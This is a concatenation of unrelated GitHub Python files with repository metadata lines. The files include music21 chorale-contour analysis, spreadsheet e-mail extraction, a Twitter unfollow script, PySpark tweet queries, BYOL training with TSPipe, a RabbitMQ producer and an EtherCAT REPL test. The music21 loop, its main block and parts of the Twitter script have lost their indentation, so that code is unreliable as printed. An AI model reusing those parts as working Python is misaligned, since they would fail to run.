'bach/bwv326', 'bach/bwv327', 'bach/bwv321', 'bach/bwv65.2',
'bach/bwv144.6', 'bach/bwv194.12', 'bach/bwv398', 'bach/bwv317',
'bach/bwv153.9', 'bach/bwv300', 'bach/bwv56.5', 'bach/bwv423',
'bach/bwv306', 'bach/bwv40.6', 'bach/bwv123.6', 'bach/bwv245.28',
'bach/bwv279', 'bach/bwv378', 'bach/bwv366', 'bach/bwv45.7', 'bach/bwv295',
'bach/bwv245.14', 'bach/bwv122.6', 'bach/bwv355', 'bach/bwv357',
'bach/bwv94.8', 'bach/bwv348', 'bach/bwv349', 'bach/bwv312',
'bach/bwv325', 'bach/bwv245.37', 'bach/bwv37.6', 'bach/bwv283',
'bach/bwv299', 'bach/bwv294', 'bach/bwv245.15', 'bach/bwv176.6',
'bach/bwv391', 'bach/bwv350', 'bach/bwv400', 'bach/bwv372',
'bach/bwv402', 'bach/bwv282', 'bach/bwv374', 'bach/bwv60.5',
'bach/bwv356', 'bach/bwv389', 'bach/bwv40.8', 'bach/bwv174.5',
'bach/bwv340', 'bach/bwv433', 'bach/bwv322', 'bach/bwv403',
'bach/bwv267', 'bach/bwv261', 'bach/bwv245.40', 'bach/bwv33.6',
'bach/bwv269', 'bach/bwv266', 'bach/bwv43.11', 'bach/bwv10.7',
'bach/bwv343', 'bach/bwv311']
currentNum = 1
#BCI = corpus.chorales.Iterator(1, 371, returnType='filename') #highest number is 371
#highestNum = BCI.highestNumber
#currentNum = BCI.currentNumber
for chorale in goodChorales:
print(currentNum)
currentNum +=1
# '''
# if chorale == 'bach/bwv277':
# continue #this chorale here has an added measure
# # container randomly in the middle which breaks things.
# '''
chorale = corpus.parse(chorale)
# '''
# if len(chorale.parts) is not 4:
# print("chorale had too many parts")
# continue
# '''
chorale = repeat.RepeatFinder(chorale).simplify()
# '''
# length = len( chorale.measureOffsetMap() )
# if length < 10:
# print("too short")
# continue
# elif length > 25:
# print("too long")
# continue
# '''
cf= ContourFinder(chorale)
ac.addPieceToContour(cf, 'dissonance')
ac.addPieceToContour(cf, 'tonality')
ac.addPieceToContour(cf, 'spacing')
print(ac.aggContours['dissonance'])
print(ac.aggContours['tonality'])
print(ac.aggContours['spacing'])
for cType in ['spacing', 'tonality', 'dissonance']:
print("considering", cType, ": ")
cf = ContourFinder()
totalSuccesses = 0
totalFailures = 0
for j in range( len(ac.aggContours[cType])):
contDict = ac.aggContours[cType][j]
observed = ac.dissimilarityScore(cType, contDict)
successes = 0
for i in range(100):
randomized = ac.dissimilarityScore( cType, cf.randomize(contDict) )
if randomized > observed:
successes += 1
if successes > 50:
totalSuccesses += 1
#print "GREAT SUCCESS!"
else:
totalFailures += 1
print("failure: chorale " + goodChorales[j]) #index ", str(i)
print(cType, ": totalSuccesses =", str(totalSuccesses),
"totalFailures =", str(totalFailures))
def _plotChoraleContours():
    '''
    Debug helper: save a tonality contour plot for each of the first 75 Bach
    chorales.  On the first Music21Exception, print and show the offending
    chorale, then stop.
    '''
    BCI = corpus.chorales.Iterator(1, 75, returnType='filename')
    for chorale in BCI:
        s = corpus.parse(chorale)
        cf = ContourFinder(s)
        # strip the 'bach/' prefix so the plot file is named after the BWV number
        chorale = chorale[5:]
        print(chorale)
        #cf.plot('dissonance', fileName= chorale + 'dissonance', regression=False)
        try:
            cf.plot('tonality', fileName= chorale + 'tonality', regression=False)
        except exceptions21.Music21Exception:
            print(chorale)
            s.show()
            break

        pass
#------------------------
class Test(unittest.TestCase):
    '''Placeholder test case so music21.mainTest has something to run.'''
    def runTest(self):
        pass
if __name__ == "__main__":
import music21
music21.mainTest(Test, 'moduleRelative')
| cuthbertLab/music21-tools | contour/contour.py | contour.py | py | 30,165 | python | en | code | 37 | github-code | 36 |
25952738898 | #encoding utf-8
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.worksheet.table import Table, TableStyleInfo
import os
import re
def salvar_email():
    """Extract e-mail addresses from the SMTP rows of email.xlsx and write
    them into column 2 of the workbook's 'result' sheet.

    Each qualifying row of the active sheet is split on commas; unwanted
    addresses are blanked out ("0") and the surrounding bracket characters
    are stripped from real addresses before they are written and saved.
    """
    # raw string: the original literal mixed / and \ separators, which emits
    # invalid-escape warnings on modern Python without changing the value
    path = r'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
    arquivo_excel = load_workbook(path)
    separados = arquivo_excel.active  # the sheet holding the raw export
    max_linha = separados.max_row
    contador = 1  # next free row in the 'result' sheet
    # openpyxl rows are 1-indexed and max_row is inclusive, so iterate to
    # max_linha + 1 (the original range(1, max_linha) skipped the last row)
    for i in range(1, max_linha + 1):
        a1 = str(separados.cell(row=i, column=1).value)
        # only rows mentioning SMTP carry addresses; the original pattern
        # '\\SMTP\\b' was [non-whitespace]+'MTP', almost certainly meant \bSMTP\b
        if re.search(r'\bSMTP\b', a1, re.IGNORECASE):
            email = a1.split(',')
            for g in range(len(email)):
                # blank out addresses that must never be exported
                if re.search('ricardo.campos', email[g], re.IGNORECASE):
                    email[g] = "0"
                if re.search('postmaster', email[g], re.IGNORECASE):
                    email[g] = "0"
                if re.search('@', email[g], re.IGNORECASE):
                    # strip one bracketing character from each end
                    email[g] = email[g][1:-1]
                    # write into the 'result' sheet (does not change the active sheet)
                    result = arquivo_excel['result']
                    result.cell(row=contador, column=2).value = email[g]
                    contador = contador + 1
                    print(email[g])
    arquivo_excel.save(path)
    os.system("PAUSE")  # Windows-only pause so the console stays open
def retira():
    """Copy column 2 of the workbook's third sheet into column 4 of its
    second sheet, dropping the first five characters of each value,
    then save the workbook.

    NOTE(review): the [5:] slice presumably removes a fixed-width prefix
    such as 'SMTP:' -- confirm against the workbook contents.
    """
    # raw string: avoids invalid-escape warnings without changing the path value
    path = r'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
    arquivo_excel = load_workbook(path)
    sheets = arquivo_excel.sheetnames
    print(sheets)
    destino = arquivo_excel[sheets[1]]  # second sheet: receives the values
    origem = arquivo_excel[sheets[2]]   # third sheet: source of the values
    max_linha = origem.max_row
    contador = 1  # next row to write in the destination sheet
    # openpyxl rows are 1-indexed and max_row is inclusive, so iterate to
    # max_linha + 1 (the original range(1, max_linha) skipped the last row)
    for i in range(1, max_linha + 1):
        a1 = str(origem.cell(row=i, column=2).value)
        print(a1[5:])
        destino.cell(row=contador, column=4).value = a1[5:]
        contador = contador + 1
    arquivo_excel.save(path)
    os.system("PAUSE")  # Windows-only pause so the console stays open
#salvar_email()
retira()
| ricardocvel/buscarEmail_excel- | inteirarExcel.py | inteirarExcel.py | py | 2,400 | python | pt | code | 0 | github-code | 36 |
34729716556 | #!/usr/bin/python3
from twitter import *
import time
import json
with open('./conf.json') as file: conf = json.load(file)
tw = Twitter(auth=OAuth(conf['token'], conf['token_key'], conf['con_sec'], conf['con_sec_key']))
# Collect all friend and follower ids via Twitter's cursored pagination,
# then unfollow every account that does not follow back.
maxcount = 5000
friends = []
followers = []

# page through friend ids; next_cursor == 0 marks the final page
# NOTE(review): one extra API call is made after the last page, since the
# fetch happens before the while condition is re-checked -- harmless but wasteful
res = tw.friends.ids(count=maxcount)
cursor = -1
while cursor != 0:
    for id in res['ids']: friends.append(id)
    cursor = res['next_cursor']
    res = tw.friends.ids(count=maxcount,cursor=cursor)

# same pagination for follower ids
res = tw.followers.ids(count=maxcount)
cursor = -1
while cursor != 0:
    for id in res['ids']: followers.append(id)
    cursor = res['next_cursor']
    res = tw.followers.ids(count=maxcount,cursor=cursor)

print("%s friends (users subscribed by the account)." % len(friends))
print("%s followers (users following the account)." % len(followers))
print("\n")

# accounts we follow that do not follow us back
friendsOnly = list(set(friends) - set(followers))

for uid in friendsOnly:
    print("uid: %s" % uid)
    # destroy the friendship (i.e. unfollow)
    res = tw.friendships.destroy(user_id=uid)

print("%i friendsOnly removed : %s\n" % (len(friendsOnly), friendsOnly))
| jdxlabs/twitter_diff | remove_friendsonly.py | remove_friendsonly.py | py | 1,048 | python | en | code | 0 | github-code | 36 |
42350249999 | from flask import jsonify
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
import pandas as pd
import io
# Build (or reuse) the SparkSession for this analysis.
# NOTE(review): "Saprk" is a typo in the app name string; left as-is because it
# is a runtime value, not a comment.
spark = SparkSession \
    .builder \
    .appName("Tweets Analysis using Python Saprk") \
    .getOrCreate()

# load the exported tweets into a DataFrame
df = spark.read.json("importedtweetsdata.json")
# Register the DataFrame as a SQL temporary view so spark.sql can query it
df.createOrReplaceTempView("MobileTweetsData")
resultdf = spark.sql("SELECT SUBSTR(created_at, 0, 20) tweetsDate, COUNT(1) tweetsCount FROM MobileTweetsData \
where text is not null GROUP BY SUBSTR(created_at, 0, 20) ORDER BY COUNT(1) DESC LIMIT 5")
# Convert the Spark result to pandas and persist it as CSV.
# NOTE(review): this rebinds the name 'pd', shadowing the pandas module imported
# above -- later code can no longer use pandas via 'pd'; consider renaming.
pd = resultdf.toPandas()
pd.to_csv('Query4Result.csv', index=False)
def query4_output():
    """Return the query-4 result as a Flask JSON response.

    NOTE(review): pd here is the module-level pandas DataFrame (the module name
    was shadowed above).  to_json already produces a JSON string, so wrapping it
    in jsonify double-encodes it -- the client receives a string, not an array.
    """
    #return pd.to_json(orient='records')
    return jsonify({"Results":pd.to_json(orient='records')})
def query4_plot():
    """Render the query-4 result as a bar chart and return it as an
    in-memory PNG buffer (seeked to the start, ready to stream)."""
    # pd is the module-level DataFrame (pandas module name shadowed above)
    pd.plot(kind="bar", x="tweetsDate", y="tweetsCount",
            title="Number of tweets for date")
    image = io.BytesIO()
    plt.savefig(image, format='png')
    image.seek(0)  # rewind so callers can read the PNG from the beginning
    return image
| pujithasak/TweetsAnalysisPythonProject | AnalysisQuery4.py | AnalysisQuery4.py | py | 1,055 | python | en | code | 0 | github-code | 36 |
23411614254 | # -*- coding: utf-8 -*-
from aws_arns.srv.ecr import (
EcrRepository,
)
def test():
    """Round-trip an ECR repository through ARN, URI and field-wise
    construction, asserting all three representations agree."""
    arn = "arn:aws:ecr:us-east-1:123456789012:repository/my-repo"
    repo = EcrRepository.from_arn(arn)
    uri = repo.uri
    assert repo.repo_name == "my-repo"
    # parsing the generated URI must reproduce the same repository object
    assert EcrRepository.from_uri(uri) == repo
    # building from the individual fields must also reproduce it
    assert (
        EcrRepository.new(
            aws_region=repo.region,
            aws_account_id=repo.account_id,
            repo_name=repo.repo_name,
        )
        == repo
    )
if __name__ == "__main__":
from aws_arns.tests.helper import run_cov_test
run_cov_test(__file__, "aws_arns.srv.ecr", preview=False)
| MacHu-GWU/aws_arns-project | tests/srv/test_ecr.py | test_ecr.py | py | 635 | python | en | code | 0 | github-code | 36 |
71075259305 | class Solution:
def fourSum(self, nums: List[int], target: int) -> List[List[int]]:
def ksum(nums,target,k):
ans=[]
if len(nums)==0 or nums[0]*k>target or nums[-1]*k<target:
return ans
if k==2:
return twosum(nums,target)
for i in range(len(nums)):
if i==0 or nums[i-1]!=nums[i]:
for subset in ksum(nums[i+1:],target-nums[i],k-1):
ans.append([nums[i]]+subset)
return ans
def twosum(numss,target):
ans=[]
l=0
r=len(numss)-1
while l<r:
two_sum=numss[l]+numss[r]
if two_sum==target:
ans.append([numss[l],numss[r]])
l+=1
r-=1
while l<r and numss[l]==numss[l-1]:
l+=1
while l<r and numss[r]==numss[r+1]:
r-=1
elif two_sum>target:
r-=1
else:
l+=1
return ans
nums.sort()
return ksum(nums,target,4) | nango94213/Leetcode-solution | 18-4sum/18-4sum.py | 18-4sum.py | py | 1,216 | python | en | code | 2 | github-code | 36 |
42262216968 | import os
import math
import multiprocessing
from tqdm import tqdm
from argparse import Namespace
from typing import Iterable, Optional
mp = multiprocessing.get_context("spawn")
from utils import _create_model_training_folder
import torch
import torch.nn.functional as F
import torchvision
from torch.nn.parameter import Parameter
from torch.utils.tensorboard import SummaryWriter
from tspipe import TSPipe
from tspipe.profiler import profile_semantic
from tspipe.dataloader import FastDataLoader, DummyInputGenerator
class BYOLTrainer:
    def __init__(self, online_network, target_network, predictor, optimizer, device, scheduler, **params):
        '''
        Set up a BYOL trainer: online/target encoder pair, predictor head,
        optimizer/scheduler, and hyperparameters pulled from **params
        (max_epochs, m = EMA momentum, batch_size, num_workers,
        checkpoint_interval, input_shape, dummy_input).
        '''
        self.online_network = online_network
        self.target_network = target_network
        self.optimizer = optimizer
        self.device = device
        self.predictor = predictor
        self.max_epochs = params['max_epochs']
        self.writer = SummaryWriter()
        self.m = params['m']  # EMA momentum for the target-network update
        self.batch_size = params['batch_size']
        self.num_workers = params['num_workers']
        self.checkpoint_interval = params['checkpoint_interval']
        # NOTE(review): eval() on a config string is unsafe for untrusted
        # configs; input_shape is expected to be a tuple literal like "(96, 96, 3)"
        self.image_x = eval(params['input_shape'])[0]
        self.scheduler = scheduler
        # snapshot config and entry scripts next to the TensorBoard run dir
        _create_model_training_folder(self.writer, files_to_same=["./config/config.yaml", "main.py", 'trainer.py'])
        self.dummy_input = True if params['dummy_input'] == True else False
        if self.dummy_input:
            print("Warning: Dummy Input Enabled.")
    @torch.no_grad()
    def _update_target_network_parameters(self):
        """
        Momentum update of the key encoder:
        target = m * target + (1 - m) * online, applied parameter-wise.
        Runs under no_grad since the target network is never trained directly.
        """
        for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
            param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@staticmethod
def regression_loss(x, y):
x = F.normalize(x, dim=1)
y = F.normalize(y, dim=1)
return 2 - 2 * (x * y).sum(dim=-1)
    def initializes_target_network(self):
        # init momentum network as encoder net: copy the online weights and
        # freeze the target so it is only ever updated via the EMA rule
        for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
            param_k.data.copy_(param_q.data)  # initialize
            param_k.requires_grad = False  # not update by gradient
def train(self, train_dataset):
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=True)
niter = 0
model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
self.initializes_target_network()
batch_id = 0
for epoch_counter in range(self.max_epochs):
if self.dummy_input:
dummy_input_gen = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
pbar = tqdm(dummy_input_gen)
else:
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
batch_id += 1
profile_semantic(niter, 0, 0, False, None, 0, 'copy')
batch_view_1 = batch_view_1.to(self.device)
profile_semantic(niter, 0, 0, False, None, 0, 'copy_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'copy')
batch_view_2 = batch_view_2.to(self.device)
profile_semantic(niter, 1, 0, False, None, 0, 'copy_finish')
if niter == 0:
grid = torchvision.utils.make_grid(batch_view_1[:32])
self.writer.add_image('views_1', grid, global_step=niter)
grid = torchvision.utils.make_grid(batch_view_2[:32])
self.writer.add_image('views_2', grid, global_step=niter)
loss = self.update(batch_view_1, batch_view_2, niter)
self.writer.add_scalar('loss', loss, global_step=niter)
# torch.cuda.nvtx.range_push("BackwardCompute")
profile_semantic(niter, 0, 0, False, None, 0, 'backward')
self.optimizer.zero_grad()
loss.backward()
profile_semantic(niter, 0, 0, False, None, 0, 'backward_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'optimize')
self.optimizer.step()
# torch.cuda.nvtx.range_pop()
self._update_target_network_parameters() # update the key encoder
profile_semantic(niter, 0, 0, False, None, 0, 'optimize_finish')
pbar.set_postfix({'loss': loss, 'batch_id': batch_id})
niter += 1
if batch_id % 100 == 0:
self.save_model(os.path.join(model_checkpoints_folder, f'model_batch{batch_id}_part0.pt'))
if batch_id > 1:
loss_fn = torch.nn.MSELoss(reduction='sum')
print("End of epoch {}".format(epoch_counter))
if self.scheduler is not None:
self.scheduler.step()
# save checkpoints
self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
def update(self, batch_view_1, batch_view_2, niter = 0):
# compute query feature
profile_semantic(niter, 0, 0, False, None, 0, 'compute')
predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
profile_semantic(niter, 0, 0, False, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'compute')
predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
profile_semantic(niter, 1, 0, False, None, 0, 'compute_finish')
# compute key features
with torch.no_grad():
profile_semantic(niter, 0, 0, True, None, 0, 'compute')
targets_to_view_2 = self.target_network(batch_view_1)
profile_semantic(niter, 0, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, True, None, 0, 'compute')
targets_to_view_1 = self.target_network(batch_view_2)
profile_semantic(niter, 1, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
return loss.mean()
def save_model(self, PATH):
torch.save({
'online_network_state_dict': self.online_network.state_dict(),
'target_network_state_dict': self.target_network.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
}, PATH)
class DummyBYOLTrainer(BYOLTrainer):
    """Trainer variant that only exercises the data pipeline.

    It builds the loader and drains every batch exactly as the real trainer
    would, but performs no forward/backward pass — useful for measuring
    data-loading throughput in isolation.
    """
    def train(self, train_dataset):
        """Iterate *train_dataset* for ``self.max_epochs`` epochs without training."""
        loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
                                num_workers=self.num_workers, drop_last=False, shuffle=True)
        self.initializes_target_network()
        for epoch in range(self.max_epochs):
            progress = tqdm(loader)
            for (view_a, view_b), _ in progress:
                pass  # intentionally no compute: data-pipeline dry run
            print("End of epoch {}".format(epoch))
class TSPipeBYOLTrainer(BYOLTrainer):
    """BYOL trainer that delegates compute to a TSPipe pipeline.

    Instead of running forward/backward locally, train() feeds shared-memory
    batches into a TSPipe instance, which schedules the online/target/predictor
    networks across pipeline stages.  Learning rate and EMA momentum follow
    the usual warmup + half-cycle cosine schedules and are pushed into the
    pipeline at each epoch boundary.
    """
    def __init__(self, online_network, target_network, predictor, optimizer: torch.optim.Optimizer, device, scheduler, **params):
        super().__init__(online_network, target_network, predictor, optimizer, device, scheduler, **params)
        # NOTE(review): most of these attributes are already set by the base
        # __init__ above; the reassignments are redundant but harmless.
        self.optimizer = optimizer
        self.online_network = online_network
        self.target_network = target_network
        self.predictor_network = predictor
        self.dummy_input = True if params['dummy_input'] == True else False
        self.image_x = eval(params['input_shape'])[0]
        self.scheduler = scheduler
        self.params = params
        if self.dummy_input:
            print("Warning: Dummy Input Enabled.")
    @staticmethod
    def contrastive_loss(online_view_1, online_view_2, target_view_1, target_view_2, args: Namespace, extra_args: Namespace):
        """Symmetric BYOL loss used as TSPipe's loss callback (args unused here)."""
        loss = TSPipeBYOLTrainer.regression_loss(online_view_1, target_view_2)
        loss += TSPipeBYOLTrainer.regression_loss(online_view_2, target_view_1)
        return loss.mean()
    @staticmethod
    def calculate_target_network_parameters(m, online_new_param, target_param:Optional[Iterable[Parameter]] = None):
        """
        Momentum update of the key encoder
        """
        # Returns NEW detached tensors (m * target + (1 - m) * online) instead
        # of mutating in place — TSPipe installs them into the target network.
        @torch.no_grad()
        def calc():
            result = []
            for param_q, param_k in zip(online_new_param, target_param):
                detached = param_k.clone().detach()
                detached = detached * m + param_q.data * (1. - m)
                result.append(detached)
            return result
        return calc()
    def train(self, train_dataset):
        """Run pipelined BYOL training; only the primary TSPipe rank feeds data."""
        model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
        self.initializes_target_network()
        initial_lr = self.optimizer.param_groups[0]['lr']
        print(f"initial_lr : {initial_lr}")
        initial_momentum = self.params['m']
        print(f"initial_momentum : {initial_momentum}")
        warmup_epochs = 10
        # Prime the schedules for epoch 0 before the pipeline starts.
        lr = self.adjust_learning_rate(1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
        m = self.adjust_moco_momentum(0, initial_momentum)
        # NOTE(review): the pipeline is seeded with self.m (the raw config
        # momentum), not the scheduled m computed just above — confirm intent.
        self.tspipe = TSPipe(self.online_network,
                             self.target_network,
                             self.predictor_network,
                             self.optimizer,
                             TSPipeBYOLTrainer.contrastive_loss,
                             TSPipeBYOLTrainer.calculate_target_network_parameters,
                             self.m,
                             model_checkpoints_folder
                             )
        if self.tspipe.is_primary:
            # prepare dataloader
            if self.dummy_input:
                train_loader = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
            else:
                train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
                                              num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=False)
            iters_per_epoch = len(train_loader)
            print(f"iters_per_epoch : {iters_per_epoch}")
            niter = 0
            for epoch_counter in range(self.max_epochs):
                pbar = tqdm(train_loader)
                for (batch_view_1, batch_view_2), _ in pbar:
                    if niter == 0:
                        grid = torchvision.utils.make_grid(batch_view_1[:32])
                        self.writer.add_image('views_1', grid, global_step=niter)
                        grid = torchvision.utils.make_grid(batch_view_2[:32])
                        self.writer.add_image('views_2', grid, global_step=niter)
                    # Batches are moved to shared memory so pipeline worker
                    # processes can read them without a copy; feed() returns a
                    # loss only once the pipeline has produced one (else None).
                    loss = self.tspipe.feed(batch_view_1.share_memory_(), batch_view_2.share_memory_())
                    if loss is not None:
                        self.writer.add_scalar('loss', loss, global_step=niter)
                        pbar.set_postfix({'loss': loss, 'batch_id': niter})
                    niter += 1
                print("End of epoch {}".format(epoch_counter))
                self.tspipe.feed_epoch()
                # Advance both schedules and propagate them into the pipeline.
                lr = self.adjust_learning_rate(epoch_counter+1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
                m = self.adjust_moco_momentum(epoch_counter, initial_momentum)
                self.tspipe.update_lr(lr)
                self.tspipe.update_momentum(m)
                self.writer.add_scalar('learning_rate', lr, global_step=niter)
                self.writer.add_scalar('momentum', m, global_step=niter)
            self.tspipe.stop()
            # save checkpoints
            print("Saving checkpoints...")
            self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
            print("Saving checkpoints OK")
    def adjust_learning_rate(self, epoch, warmup_epochs, initial_lr):
        """Decays the learning rate with half-cycle cosine after warmup"""
        if epoch < warmup_epochs:
            # Linear warmup from 0 to initial_lr.
            lr = initial_lr * epoch / warmup_epochs
        else:
            lr = initial_lr * 0.5 * (1. + math.cos(math.pi * (epoch - warmup_epochs) / (self.params['max_epochs'] - warmup_epochs)))
        for param_group in self.optimizer.param_groups:
            param_group['lr'] = lr
        return lr
    def adjust_moco_momentum(self, epoch, initial_momentum):
        """Adjust moco momentum based on current epoch"""
        # Cosine ramp from initial_momentum toward 1.0 over training.
        m = 1. - 0.5 * (1. + math.cos(math.pi * epoch / self.params['max_epochs'])) * (1. - initial_momentum)
        return m
    def update(self, batch_view_1, batch_view_2):
        """Non-pipelined BYOL loss (kept for parity with the base class)."""
        # compute query feature
        predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
        predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
        # compute key features
        with torch.no_grad():
            targets_to_view_2 = self.target_network(batch_view_1)
            targets_to_view_1 = self.target_network(batch_view_2)
        loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
        loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
return loss.mean() | kaist-ina/TSPipe | benchmarks/byol/trainer.py | trainer.py | py | 13,650 | python | en | code | 6 | github-code | 36 |
30631149331 | """Python Program for cube sum of first n natural numbers
Print the sum of the series 1^3 + 2^3 + 3^3 + 4^3 + ... + n^3 up to the n-th term.
Examples:
Input : n = 5
Output : 225
1^3 + 2^3 + 3^3 + 4^3 + 5^3 = 225
Input : n = 7
Output : 784
1^3 + 2^3 + 3^3 + 4^3 + 5^3 +
6^3 + 7^3 = 784"""
# #program1
# n = int(input("Enter the N: "))
# def SumOfCubes(n):
# sum = 0
# for i in range(1,n+1):
# sum = sum +(i*i*i)
# return sum
# print(SumOfCubes(n))
#program2
"""Time Complexity : O(n)
An efficient solution
is to use direct mathematical formula which is (n ( n + 1 ) / 2) ^ 2
For n = 5 sum by formula is
(5*(5 + 1 ) / 2)) ^ 2
= (5*6/2) ^ 2
= (15) ^ 2
= 225
For n = 7, sum by formula is
(7*(7 + 1 ) / 2)) ^ 2
= (7*8/2) ^ 2
= (28) ^ 2
= 784"""
#
# n = int(input("Enter the number to find the sum of cubes: "))
# def SumOfCubes(n):
# return (n*(n+1)//2)**2
# print(SumOfCubes(n))
#Program3
"""e can prove the formula using mathematical induction.
We can easily see that the formula holds true for n = 1 and n = 2. Let this be true for n = k-1.
Let the formula
be true for n = k-1.
Sum of first
    (k-1) natural numbers = [((k - 1) * k)/2]^2
Sum of cubes of first k natural numbers
    = Sum for (k-1) numbers + k^3
    = [((k - 1) * k)/2]^2 + k^3
    = [k^2(k^2 - 2k + 1) + 4k^3]/4
    = [k^4 + 2k^3 + k^2]/4
    = k^2(k^2 + 2k + 1)/4
    = [k*(k+1)/2]^2
The above program causes overflow,
even if result is not beyond integer limit.
Like previous post,
we can avoid overflow upto some extent by doing division first.
"""
# Efficient Python program to find sum of cubes
# of first n natural numbers that avoids
# overflow if result is going to be withing
# limits.
# Returns the sum of series
def sumOfSeries(n):
    """Return 1^3 + 2^3 + ... + n^3 via the closed form (n*(n+1)/2)^2.

    Halves the even factor with integer floor division before multiplying,
    so the computation stays in exact integer arithmetic.  The original
    used float division (n/2), which loses precision once n*(n+1)/2
    exceeds 2**53; this version is exact for arbitrarily large n.
    """
    if n % 2 == 0:
        half_product = (n // 2) * (n + 1)   # n is even, so n/2 is exact
    else:
        half_product = ((n + 1) // 2) * n   # n+1 is even, so (n+1)/2 is exact
    return half_product * half_product
# Driver Function
# Demo: prints 225, the sum of the first five cubes.
n = 5
print(sumOfSeries(n))
| nishanthhollar/geeksforgeeks_python_basic_programs | basic_programs/cube_of_squares_of_natural_nos.py | cube_of_squares_of_natural_nos.py | py | 2,091 | python | en | code | 0 | github-code | 36 |
20528044643 | import pika
connection = pika.BlockingConnection( # establish a blocking connection to the broker
    pika.ConnectionParameters(host='localhost')
)
channel = connection.channel() # open a channel on the connection
# declare the queue (durable=True: the queue survives a broker restart)
channel.queue_declare(queue='hello2',durable=True)
channel.basic_publish(exchange='',
                      routing_key='hello2',
                      body='Hello World!',
                      properties=pika.BasicProperties(delivery_mode=2,  # 2 = persist the message to disk
                                                      )
                      )
# routing_key: the queue name to publish to
# body: the message payload
print(" [x] Sent 'Hello World!3'")
connection.close() #关闭连接 | chenyaqiao0505/Code111 | RabbitMQ/producter.py | producter.py | py | 572 | python | en | code | 0 | github-code | 36 |
26896963958 | #!/usr/bin/env python3
import sys
import time
import socket
import yaml
from dataclasses import asdict
import ipywidgets.widgets as widgets
from IPython.display import display
print(sys.executable)
from ecat_repl import ZmsgIO
from ecat_repl import FoeMaster
from ecat_repl import CtrlCmd
from ecat_repl import SdoCmd
from ecat_repl import SdoInfo
from ecat_repl import (
master_cmd_stop,
master_cmd_start,
master_cmd_get_slave_descr,
#
flash_cmd_load_default,
flash_cmd_save_flash,
flash_cmd_load_flash,
#
ctrl_cmd_start,
ctrl_cmd_stop,
ctrl_cmd_fan,
ctrl_cmd_led,
ctrl_cmd_run_torque_calib,
ctrl_cmd_set_home,
ctrl_cmd_set_zero,
ctrl_cmd_set_min_pos,
ctrl_cmd_set_max_pos,
ctrl_cmd_set_position,
ctrl_cmd_set_velocity,
ctrl_cmd_set_torque,
ctrl_cmd_set_current,
ctrl_cmd_dac_tune,
ctrl_cmd_get_adc,
ctrl_cmd_set_dac,
ctrl_cmd_test_done,
ctrl_cmd_test_error,
)
# Connect to the EtherCAT REPL service over ZeroMQ and restart the master in
# configuration mode, using the EtherCAT bus position as the slave id.
uri = "localhost:5555"
io = ZmsgIO(uri)
io.debug = False
scan_ids = []
io.doit(master_cmd_stop)
io.doit(master_cmd_start.set_args({'app_mode':'config_mode','use_ecat_pos_as_id':'true'}))
# Ask the master for the list of detected slaves (YAML keyed by slave id).
reply = io.doit(master_cmd_get_slave_descr)
yaml_msg = yaml.safe_load(reply['msg'])
scan_ids = yaml_msg.keys()
ids=list(scan_ids)
print(ids)
# Query SDO metadata from the first slave: names, then object descriptors.
reply = io.doit(SdoInfo(u'SDO_NAME').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_names = yaml_msg
print(sdo_names)
reply = io.doit(SdoInfo(u'SDO_OBJD').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_infos = yaml_msg
print(sdo_infos)
# Poll every known SDO from the first slave 100 times at ~10 Hz.
for i in range(100):
    reply = io.doit(SdoCmd(rd_sdo=sdo_names,wr_sdo={}).set_bid(ids[0]))
    yaml_msg = yaml.safe_load(reply['msg'])
    print(yaml_msg)
    time.sleep(0.1)
#io.doit(SdoCmd(rd_sdo=['fw_ver'],wr_sdo={'board_id': 101}).set_bid(ids[0]))
#io.doit(flash_cmd_save_flash.set_bid(ids[0])) | alessiomargan/Ecat-repl | ecat_repl/test/ecat_advr.py | ecat_advr.py | py | 1,873 | python | en | code | 0 | github-code | 36 |
37417551271 | import os
from os.path import join
import sys
import json
import numpy as np
# from .read_openpose import read_openpose
import utils.segms as segm_utils
def db_coco_extract(dataset_path, subset, out_path):
    """Extract DensePose-COCO annotations for *subset* into one .npz file.

    Reads ``densepose_coco_2014_<subset>.json`` under *dataset_path*, keeps
    only annotations that carry DensePose masks, converts COCO keypoints to
    the 24-joint order and to SMPL joints, and saves image names, bbox-derived
    center/scale, keypoints and the raw DensePose fields to
    ``<out_path>/dp_coco_2014_<subset>.npz``.
    """
    # convert joints to global order
